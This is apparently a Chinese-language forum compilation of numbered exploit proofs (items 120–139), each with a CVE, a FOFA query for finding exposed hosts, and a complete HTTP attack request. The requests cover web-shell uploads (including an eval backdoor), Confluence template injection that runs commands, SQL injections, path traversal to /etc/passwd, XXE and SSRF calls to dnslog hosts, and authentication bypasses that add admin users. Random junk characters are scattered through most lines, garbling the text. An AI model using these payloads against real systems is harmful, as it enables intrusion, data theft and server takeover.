3 T7 o4 Z4 b# c% g$ ~$ A$ i- Z120. 北京百绰智能S40管理平台导入web.php任意文件上传
0 r u0 {9 C, x e/ OCVE-2024-1253$ I! t/ V, h4 A; @& v
FOFA:title="Smart管理平台"
4 }8 Q* E8 v2 A) \9 G! vPOST /useratte/web.php? HTTP/1.1( g; M% n1 y; X9 L
Host: ip:port
$ d9 I* h' v/ l' Y" pCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db- l9 |9 Z1 r, e$ O9 k& {# X0 o2 a% j
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& `- @; N% K% l A! j* D. c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 I i7 R6 m0 k$ T7 `4 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! M' B2 c' w( R; ^1 z7 b
Accept-Encoding: gzip, deflate: {3 u% a% o4 E$ p
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
3 S+ F& G( n% B% }9 W3 eContent-Length: 597
1 X; M/ e6 C3 u, G. V, d# L' FOrigin: https://ip:port# `6 m" a1 c8 ]3 j) o$ d% V2 s
Referer: https://ip:port/sysmanage/licence.php
- E3 C0 o* ~( C% K' FUpgrade-Insecure-Requests: 1; h6 D* K3 n: v. l
Sec-Fetch-Dest: document" i- r. ?3 w% i0 W) D/ y
Sec-Fetch-Mode: navigate6 {5 U6 C" s3 g5 Z! C! B
Sec-Fetch-Site: same-origin
/ z3 v2 c4 K1 U" M: C7 o& ]Sec-Fetch-User: ?1
% Z% r- \4 J$ m! K1 TTe: trailers( n, {$ q7 _# l* C) Z
Connection: close( R3 q! b3 a+ I
1 ?4 i7 Q9 n s# _: a% H( k6 ?-----------------------------42328904123665875270630079328
) w# g" P. x) b# s( ]! ~7 zContent-Disposition: form-data; name="file_upload"; filename="2.php"
5 } g- _7 j4 W* R- |Content-Type: application/octet-stream- _* a3 w- b) X. |$ n4 f
) n" {# j; Q/ m$ K7 F<?php phpinfo()?>
- L& N) ]+ o0 v$ v2 Y-----------------------------42328904123665875270630079328
# Y3 D( `, z; `) S7 J3 WContent-Disposition: form-data; name="id_type"3 S2 h3 w: K" K1 m; T, @5 v/ w
5 i+ Q! n$ S2 h- |- h
1& u9 g8 B7 ?4 w7 r. j+ P
-----------------------------42328904123665875270630079328
- |8 a, A7 y9 x; d' v/ eContent-Disposition: form-data; name="1_ck". U9 r- Y% H4 y9 I, Z+ F8 v0 O# A
- Y- } M& l1 K
1_radhttp0 k, J) s! \1 Y& q. ~
-----------------------------42328904123665875270630079328
; v8 n+ t& B) G/ W( H' U% {) HContent-Disposition: form-data; name="mode"
5 u( q9 I! Y' Q S% m" Q
! E* e$ z0 j! A9 a: gimport8 `4 {# F6 p! e* J' Q/ G; R
-----------------------------423289041236658752706300793284 ?+ [' }. v7 ? s, T* }
( ^5 c6 F& K/ e+ E8 t. }6 M2 x4 L% U/ ^5 b
文件路径/upload/2.php/ x- ] d+ \+ Y& j* ?7 Q1 G
/ [0 ?( e. I! C: |" N
121. 北京百绰智能S42管理平台userattestation.php任意文件上传8 ~2 [9 k V! T# g' U
CVE-2024-1918! |7 V4 n" Q9 X5 d. f
FOFA:title="Smart管理平台"
0 G9 |3 W# H( x3 GPOST /useratte/userattestation.php HTTP/1.1 W& L. e6 U/ J0 ~2 Y
Host: 192.168.40.130:84435 b; x8 `0 b" Z7 B2 }' \0 ^" x
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac502 U1 ^, m* K5 b* V y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko/ x3 _- V! @7 |- n4 u7 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# C! m% r/ U. ^6 J. R- mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 A& \* J8 B; _, g9 U6 r3 G2 sAccept-Encoding: gzip, deflate4 O+ G/ p! M) y1 d. e0 \0 k4 G u; o
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328, Z0 o, F7 n5 H3 [2 E+ O1 x6 M
Content-Length: 592
# z. R) G+ x( H6 K: |+ S0 QOrigin: https://192.168.40.130:84435 I. i, c& k1 N, Z
Upgrade-Insecure-Requests: 1
4 h* H% F2 g) I( q6 v$ dSec-Fetch-Dest: document' o" K! ^* H! G- V$ w5 m* }
Sec-Fetch-Mode: navigate5 R5 ?: G( l$ T# m6 W
Sec-Fetch-Site: same-origin
+ S) U% A( K* LSec-Fetch-User: ?1
9 p( c; A% `' E/ B$ J8 I: S/ H7 w" pTe: trailers: r! \2 C( g9 ~/ U$ V
Connection: close
( A7 y8 L( E' ]1 j/ h
3 F/ I# d. W5 A/ \' C-----------------------------42328904123665875270630079328( b+ f: P. O' M( ?4 f2 t0 |
Content-Disposition: form-data; name="web_img"; filename="1.php"( f& e$ D8 A6 N2 U6 y
Content-Type: application/octet-stream, L# T0 p; N6 Z- L$ Z
4 d) e8 `0 }: Q5 Q
<?php phpinfo();?>
) R; r+ z) e9 F8 E4 b-----------------------------42328904123665875270630079328
, |" M7 ]- W! F$ ?: ZContent-Disposition: form-data; name="id_type"8 e; Q2 O# K# D2 }
' M+ u# [1 [) L0 I9 x1! ^$ X) \9 J4 I" N, }
-----------------------------42328904123665875270630079328# V4 B! g+ s0 @( M6 H
Content-Disposition: form-data; name="1_ck"7 _* ]# [; _# |: Q# }, s
5 X9 }3 R- g1 W: q+ l7 j
1_radhttp
3 k1 }0 M& t o0 e/ _# S6 p-----------------------------42328904123665875270630079328
8 I# Q! s: ]- AContent-Disposition: form-data; name="hidwel"& q0 L$ @& b! z) e! l( Q
3 z) _3 T1 h% X4 J. u5 W$ t, pset
# Y4 D! v9 ~, @+ B# m& p7 a-----------------------------42328904123665875270630079328( r+ r, v+ P7 |. q1 ]" U
8 E w$ o0 G3 N4 j$ g9 [( \
, ?/ s' H" }/ m5 X! }boot/web/upload/weblogo/1.php0 b. l! |) Q1 H6 ^( D
" P* D- w" G. ?! W2 L* Q
122. 北京百绰智能s200管理平台/importexport.php sql注入4 c! ]( W% m& Q( {
CVE-2024-27718FOFA:title="Smart管理平台"
! l$ ] ]" D& h; u3 K7 S2 o( ?" W$ P其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()+ ?3 L4 i, U7 `) z
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
# m! x# _7 Q2 WHost: x.x.x.x
0 b9 e- @8 l, l7 S) MCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
# x4 Q8 K" |( [! QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ ^/ n6 U: P- U/ E" E. S7 Z3 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% [( r: L5 B5 Y/ f, U- R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 g7 a# ]1 W ~4 m5 ?9 aAccept-Encoding: gzip, deflate, br
% A% e5 s, h) SUpgrade-Insecure-Requests: 1
/ @' B7 F% v- ]7 D" iSec-Fetch-Dest: document* G5 v# e# k0 r
Sec-Fetch-Mode: navigate
4 a# I0 I: ^8 Q( ~7 j8 @2 aSec-Fetch-Site: none, k1 P5 i+ D4 `
Sec-Fetch-User: ?1
& t0 b/ q1 {' P5 {Te: trailers% B" G; \/ l2 A# o9 x0 m
Connection: close! K3 c. n$ _# Z! n. ~
6 h! I- K7 I. \* o3 ?2 F" {$ j8 N1 T, x$ O
123. Atlassian Confluence 模板注入代码执行
! a5 a" O7 j8 v6 d. `7 zFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"0 N9 k1 o- L9 s) D8 a
POST /template/aui/text-inline.vm HTTP/1.1
' @" H; `6 x: W7 _% A) ~Host: localhost:8090
. r* S6 B1 [+ A) DAccept-Encoding: gzip, deflate, br" R8 j# p2 v t
Accept: */*0 V0 {2 ^& Y0 @' l9 m; @
Accept-Language: en-US;q=0.9,en;q=0.8# w4 }! }- Y' N. R3 ]% L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
3 ^6 E* S& t- L# ~5 d' ]Connection: close. p+ l K X+ R+ _6 U1 K+ Q
Content-Type: application/x-www-form-urlencoded
& F0 [: q. D7 b$ ~7 F0 w' d1 T6 @+ e* g
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))5 D( k3 z& p# H- }# O: z
# N; \; p# e% t" ~% Z$ a" ]0 z: q7 f
* c/ g: o/ o+ S( F' c q2 h, E
124. 湖南建研工程质量检测系统任意文件上传" W5 Y( ^6 w: L( Z# Q2 `
FOFA:body="/Content/Theme/Standard/webSite/login.css", ^4 m6 y, q9 @) h& z5 I
POST /Scripts/admintool?type=updatefile HTTP/1.1
' y& y, C4 F9 D9 pHost: 192.168.40.130:8282
t6 t' J7 ~* {' ^, HUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36- |7 e2 ~& ^; \% ^1 o4 K, F% A
Content-Length: 72! w J' h) _! \, T. N! Y C6 U6 N2 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
7 [ c' q- k; s2 }, J3 D* x4 \Accept-Encoding: gzip, deflate, br
* P3 O; }6 W6 Q% o" z5 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ?% D2 O1 g* Y& P6 _! S0 v8 o
Connection: close
E* q& H- Y& O/ ZContent-Type: application/x-www-form-urlencoded
- C& G# [ g4 q* R- \$ D+ \+ p9 |$ ]8 M" Y! p
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
, ]- g, c# j, X4 O2 V6 t* G/ ]& T$ n, R0 ~
# s* a" r1 h' \8 O- M6 Q' h) q5 _
http://192.168.40.130:8282/Scripts/abcgcg.aspx
$ z" R3 @3 Z& }
4 E) `2 T6 j0 R4 B. X) d/ w125. ConnectWise ScreenConnect身份验证绕过6 W; n$ ~$ ?, e* j; u6 r
CVE-2024-1709
& q) j& J0 @) l! J$ zFOFA:icon_hash="-82958153"9 |* {3 M2 J/ b4 S8 C/ l7 E H
https://github.com/watchtowrlabs ... bypass-add-user-poc2 Y' C7 w1 B% I5 S' G
8 Z4 g, X7 P3 k# J, X: b3 ?3 ]/ p4 e5 T7 B$ R# D# ?1 _. N
使用方法
6 q( e, h, M; j* g# `: Y0 n. fpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
$ l; W! @0 \. \/ k* ]& h
' @0 v! v! ^7 A% N( a( S9 M9 I( `
% \( ]) z& k. S, `/ u创建好用户后直接登录后台,可以执行系统命令。
1 I) c9 u- [" v6 r4 A- ~7 ]+ [+ ^+ }' K& q! _! B/ i0 R
126. Aiohttp 路径遍历
& \0 v( ?, X; g- `* k9 GFOFA:title=="ComfyUI"
+ A, u2 i- c+ `% Y4 d$ pGET /static/../../../../../etc/passwd HTTP/1.1* b5 Q0 u% L: c* U7 S
Host: x.x.x.x! c. ?0 a: K! A+ E5 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! [3 H T, o, i, T) `Connection: close8 r/ `. @) N5 n
Accept: */* G. L* A& z& `
Accept-Language: en5 ^2 o9 p& T+ l0 Q& B
Accept-Encoding: gzip1 ]4 I) J$ F7 W/ x n
0 c9 R/ j4 I3 \2 m' ^, g3 K# ?, S+ g' b% D+ Z) Y. s
127. 广联达Linkworks DataExchange.ashx XXE0 w# z0 w8 t8 d8 e
FOFA:body="Services/Identification/login.ashx"
! A; c% Y# M z' wPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.13 C- A+ h, t3 I
Host: 192.168.40.130:8888
. p2 O' a* Y$ p7 a* ]) x1 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.360 P1 o; P( G% t9 L5 |6 v
Content-Length: 415
" z0 G B! v& ^) m5 U- B! g6 W D, IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ j7 P' m) j* e- P1 T m$ {, H
Accept-Encoding: gzip, deflate A$ e `5 r7 r* N
Accept-Language: zh-CN,zh;q=0.9
+ k8 j8 A' O3 [+ x) W3 R* [- `# XConnection: close
/ f1 D! R! J) w0 x# yContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
/ k3 W. @ L' |/ ~Purpose: prefetch
- T2 Z' `) e! J1 {- gSec-Purpose: prefetch;prerender" v: ?* p$ s8 g. u5 `( ]8 e
# n; \' z; E( v/ Y2 i( C
------WebKitFormBoundaryJGgV5l5ta05yAIe08 A8 I- A2 L) n8 s
Content-Disposition: form-data;name="SystemName"
/ v/ m) O$ o& L
1 m1 P, [0 Q# H3 b% I! z7 x, v5 oBIM
$ k1 A4 w) @ e; A------WebKitFormBoundaryJGgV5l5ta05yAIe0
+ M0 w' c5 \8 n( i! [Content-Disposition: form-data;name="Params"% |1 R. X! R* T+ G) E/ H$ Q5 e
Content-Type: text/plain
8 c# R2 G2 z" `. v9 x) y( ^/ r( `# b% t! H/ L1 ^ @
<?xml version="1.0" encoding="UTF-8"?>( F8 d' r n+ w, [/ f' `: T# I7 K
<!DOCTYPE test [
( f1 g! S( L. |7 n% J$ r8 T6 n1 E<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
, B7 c6 r3 T: p( ?$ q7 L]
+ v1 r% p1 \+ Q! b2 \>
6 B- N' l$ U) C: C. t7 V<test>&t;</test>8 c8 N1 ?* h3 k' a; Z% g
------WebKitFormBoundaryJGgV5l5ta05yAIe0--, f. G" p( m, t; j" a4 Y# v; U* y
5 g$ c: b. n2 \
- ~/ k2 P7 q! v J- q5 `2 f4 O s# {6 N/ [) ^! v/ w. B. B
128. Adobe ColdFusion 反序列化$ ?, g( Z8 G! t; O: K
CVE-2023-38203; p9 N' [) h1 |( D; b
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
% m) I2 L& a3 EFOFA:app="Adobe-ColdFusion"
- R4 r" |3 Y( O5 v- HPAYLOAD
0 x& n8 a6 P8 }8 s9 z* U6 W. |# o6 O/ i
129. Adobe ColdFusion 任意文件读取
" @6 Y/ I k9 J3 a2 y- o6 l9 DCVE-2024-20767
, ]0 Q" m' C4 v0 _# T3 f1 nFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"# N/ A& N9 f) j% g5 t# F
第一步,获取uuid! X$ s# o: I7 }, d* w
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
% w# D! y; F2 L+ y$ pHost: x.x.x.x+ w3 y. n0 y0 G+ T+ L, T" w( u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 Y5 u# r* S2 p- C/ h& p( pAccept: */*
+ T. k4 ^) G" \Accept-Encoding: gzip, deflate' v0 k4 `3 M0 b" k
Connection: close
9 @- I/ I8 p& J. O: p F- S) g
9 f- X1 T6 x3 n第二步,读取/etc/passwd文件
+ g* P" G3 z" Q" i1 lGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1; I- z+ i/ z* {4 ~- p w
Host: x.x.x.x
, W( d7 f( K9 P0 R8 G MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" ?9 {: \& y6 d ~" m+ VAccept: */*0 I( A! M4 j7 G$ N1 A: \2 l
Accept-Encoding: gzip, deflate
) X! f! V% u- x# _* E% z( }Connection: close
7 _+ h( E$ S7 Iuuid: 85f60018-a654-4410-a783-f81cbd5000b94 B: ~1 k* Z4 e
% k5 F7 w3 h5 V- h6 ]
2 x B8 U Y9 {& W' J% i
130. Laykefu客服系统任意文件上传
k, ]) c3 V# b' @FOFA:icon_hash="-334624619", c0 ]# w2 w% E+ G
POST /admin/users/upavatar.html HTTP/1.13 c u. ?( @% e, k0 @
Host: 127.0.0.1
- P, O5 i- _3 ]2 _Accept: application/json, text/javascript, */*; q=0.01
% K$ _/ j8 O. K* W8 {X-Requested-With: XMLHttpRequest
9 c+ t' O0 _0 N* f+ c8 T oUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
: S H- o3 I- \* b& S0 q) DContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR3 u2 O* {" g; F
Accept-Encoding: gzip, deflate
1 B8 i: `5 f2 M7 gAccept-Language: zh-CN,zh;q=0.9
; A; G; T& {2 d3 k8 J3 R/ BCookie: user_name=1; user_id=3
* d: H# R C, KConnection: close$ k0 a4 }; i4 I b) i8 X
% W, O8 z) D; T# W* Q+ _
------WebKitFormBoundary3OCVBiwBVsNuB2kR2 m# _: M* U4 ?: ~: ?
Content-Disposition: form-data; name="file"; filename="1.php"8 T3 q$ s, _# ]( e
Content-Type: image/png; g* ^- j3 P5 I0 \
w u# `- i1 i! o
<?php phpinfo();@eval($_POST['sec']);?>) R* {) F& k' e
------WebKitFormBoundary3OCVBiwBVsNuB2kR--6 G# w: |+ s3 u" j+ f
0 g; z2 Z. K6 B' K1 |' a4 H3 Z
, \0 S3 I9 R" M; x) k, C3 q0 I6 {131. Mini-Tmall <=20231017 SQL注入
8 z+ w* _! ^" _8 ~ {, qFOFA:icon_hash="-2087517259"
2 u% }5 X- G) ?0 S$ n0 A& c$ m后台地址:http://localhost:8080/tmall/admin! N5 [8 {6 N; X
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)' H9 I$ Y, j. H9 z5 @" f
# |* A- Q# a/ U8 Y% j! H" b8 V% W
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
) {- i( l0 U- F3 k, T9 O _' DCVE-2024-27198
, V& S5 Q6 B! \) `' G; y3 b( W! FFOFA:body="Log in to TeamCity"
) U+ j' ?, F$ h8 w( ~0 s1 zPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
% d; p2 U# u. {Host: 192.168.40.130:81110 }- F7 m( n2 f/ E0 c1 n8 R+ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- \! y! }" x$ b4 k7 ?' KAccept: */*
, W' a4 O" @7 I6 D8 Q4 U9 |0 rContent-Type: application/json+ k, G" X! z& A- G4 ^4 |
Accept-Encoding: gzip, deflate
7 a' O2 O$ Q9 S% i5 v
; F1 d+ w. |5 z$ P3 Q* k{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}/ G/ ?0 ~- b# c* P5 {9 f
6 b% M& g. g* F% g' E5 t
/ ?. { R1 q M) f
CVE-2024-27199
0 g. f8 N K5 @$ F/res/../admin/diagnostic.jsp' m+ u& j1 K$ x0 z$ @5 P4 a
/.well-known/acme-challenge/../../admin/diagnostic.jsp- G4 U% v) h. E9 @2 P, }
/update/../admin/diagnostic.jsp
( ]9 J/ X9 ?% I8 j
1 f# |/ I3 F1 ?2 N) I- q: R q- E2 L$ ]4 o
CVE-2024-27198-RCE.py
, K1 s: ~7 t9 A* K B9 Y4 \! k) Z; W n2 x$ Q
133. H5 云商城 file.php 文件上传5 ?: t$ _; |: {+ d
FOFA:body="/public/qbsp.php") I/ \& b% n, k- D( ~, {- g9 c
POST /admin/commodtiy/file.php?upload=1 HTTP/1.18 n' [; T) z& ]9 `2 y( g( U" K1 e
Host: your-ip! X1 o/ b& X) Y% O9 ]! Z- n: Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% a% G0 M! S# ^* o, X6 l* |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx- L5 n& d9 s: s2 X
4 B- p2 ~% o- {0 G, Y
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
* m; G" h! Z B$ t2 OContent-Disposition: form-data; name="file"; filename="rce.php"; M% \- d& P' R- s5 P D4 T' ?
Content-Type: application/octet-stream
/ O+ c8 `# y+ p9 Y$ _
- y* \2 w( s. F<?php system("cat /etc/passwd");unlink(__FILE__);?>
% _, J0 k( U9 `$ ^------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
. V- C1 F, J. w4 @" ]" W
# _9 P# F% g" k( b5 R3 F$ X) D- |2 }5 s- ^, E9 E; z: d
! g$ |) Z8 T! b2 a
134. 网康NS-ASG应用安全网关index.php sql注入" O, o5 q/ L/ f) o" R. N: a
CVE-2024-2330# n) ] a9 q |9 z) m+ X
Netentsec NS-ASG Application Security Gateway 6.3版本
1 E6 C" A$ a/ u3 F FFOFA:app="网康科技-NS-ASG安全网关"3 v5 ]1 Z5 H* ?: k
POST /protocol/index.php HTTP/1.1+ i! f# I; A, V( ?7 l1 a5 y, [# L
Host: x.x.x.x
2 ~% n7 T5 P/ Q/ C4 u/ O9 T& hCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
/ \! @4 I) T/ P+ y- z/ Y- {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
+ r: h% O9 x$ B, @Accept: */*& V+ F9 P! H: u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- J; {8 Z6 c- m
Accept-Encoding: gzip, deflate
: E) \) e! {8 bSec-Fetch-Dest: empty
* C+ d! g+ \# ?: h0 T- Q/ cSec-Fetch-Mode: cors9 ^7 o Z9 P, c
Sec-Fetch-Site: same-origin
4 `/ d6 y/ v9 e9 I. ATe: trailers
9 n6 f4 v0 J* P2 l" Y1 ]Connection: close
3 T* D) }7 I V( O$ O+ f# kContent-Type: application/x-www-form-urlencoded
( i8 H2 h5 n6 X9 G/ V0 BContent-Length: 263
3 U N4 q2 z* \ [6 T# t3 j9 c9 b$ @! {( }
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}2 [; ]2 G1 j+ j, G. u: u
: O- E6 s$ J$ M1 h+ W: p* U& r4 E+ D( U! O
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入; P* x! c+ T/ M
CVE-2024-2022
4 I) r. y+ `: ~' r5 SNetentsec NS-ASG Application Security Gateway 6.3版本9 j+ z c& k( K- j5 \$ Q
FOFA:app="网康科技-NS-ASG安全网关"9 o4 ~. D/ U2 K0 U# P) I. d4 v! q
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
, s2 I9 s9 a* ]+ I+ y- Q" `+ MHost: x.x.x.x
# j9 F7 H% f& UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 \+ ~9 i4 W4 X% H1 K: u" b/ D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 T8 N7 A! G3 y/ d0 b3 U
Accept-Encoding: gzip, deflate8 b8 i( D; ?( ~* N+ ~7 ]
Accept-Language: zh-CN,zh;q=0.9
+ W0 K9 C, e1 g* LConnection: close+ _2 j& c, ]9 r) s
7 }9 K% b( \( @5 b4 \
' s6 W. b) S3 ]2 c% N136. NextChat cors SSRF
0 E7 W* Q4 \ l0 rCVE-2023-49785) i9 L# a7 ?2 y- I, R
FOFA:title="NextChat"/ K& P! ?* Z: t2 |
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
/ c: G( G( L0 K: u0 fHost: x.x.x.x:10000* g( n: u. T$ H/ ]1 m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' z( ?/ w1 L- f
Connection: close/ D; e6 Z, v+ W6 W( s" U, W9 V
Accept: */*6 p6 c! F2 u9 L# C0 a# Q
Accept-Language: en: b) B! C" N# Y7 e$ `% i
Accept-Encoding: gzip/ N- l% m$ V6 w }/ r2 o2 Y
6 `; s7 j* d. u- m) z% R, c
6 m" R3 p0 W# F8 J# r4 [, ^$ Q2 v137. 福建科立迅通信指挥调度平台down_file.php sql注入
# I& _! L9 R% a, o1 Q O- [CVE-2024-2620
7 Y" }) m+ v: j3 }4 _3 eFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 y; [7 u+ ~$ H+ ]
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
% F$ g7 \$ M/ W. Y, g" U! ?. rHost: x.x.x.x
# M% A- i/ P/ \8 h$ p9 ~8 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 ?6 s4 V) x4 C2 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. J3 t' X. ^1 C }7 U) n4 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! G0 Z, ^& B. Q4 {3 R$ V' S6 q
Accept-Encoding: gzip, deflate, br+ O7 N8 v+ A3 K8 c2 B/ ~
Connection: close
5 G5 B( z- @. A% nCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
/ L' o& X, s+ m3 q; [Upgrade-Insecure-Requests: 1% [) Z* J" Y* g
, S% O: x# T2 [; b6 d/ r% H6 G5 C2 R! c: C0 T. p P
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入9 e0 I+ v3 E1 A
CVE-2024-26212 W' |& m+ m- }# x" _% ]: {! b! i
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 p% I7 O, B* ]9 v7 ^+ B0 IGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.16 j: H* K6 V8 I
Host: x.x.x.x
3 a0 c5 j* ?( @& X8 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 ]4 N- a/ W: D7 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& y' |4 v5 \. ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- E' j- L; d2 ^- vAccept-Encoding: gzip, deflate, br6 h8 H/ x% z8 D
Connection: close+ B: ]: T! j. N z
Upgrade-Insecure-Requests: 1$ R' S- c, X8 r) E$ ^2 C3 }
! K5 {0 J# {! Z# \* X) B5 u
# {/ w; {( E2 F# F& a W
139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ c, r+ [8 k8 | d% G
CVE-2024-26224 |8 D& h0 f. W
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台", M" \- B% ?/ M0 N! ~
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.17 e3 k4 u. t8 G& L. I
Host: x.x.x.x5 s% _2 T$ J5 f) e v7 w! V6 |7 T& c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 {, ^7 W+ M# k! s' Z" r, w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
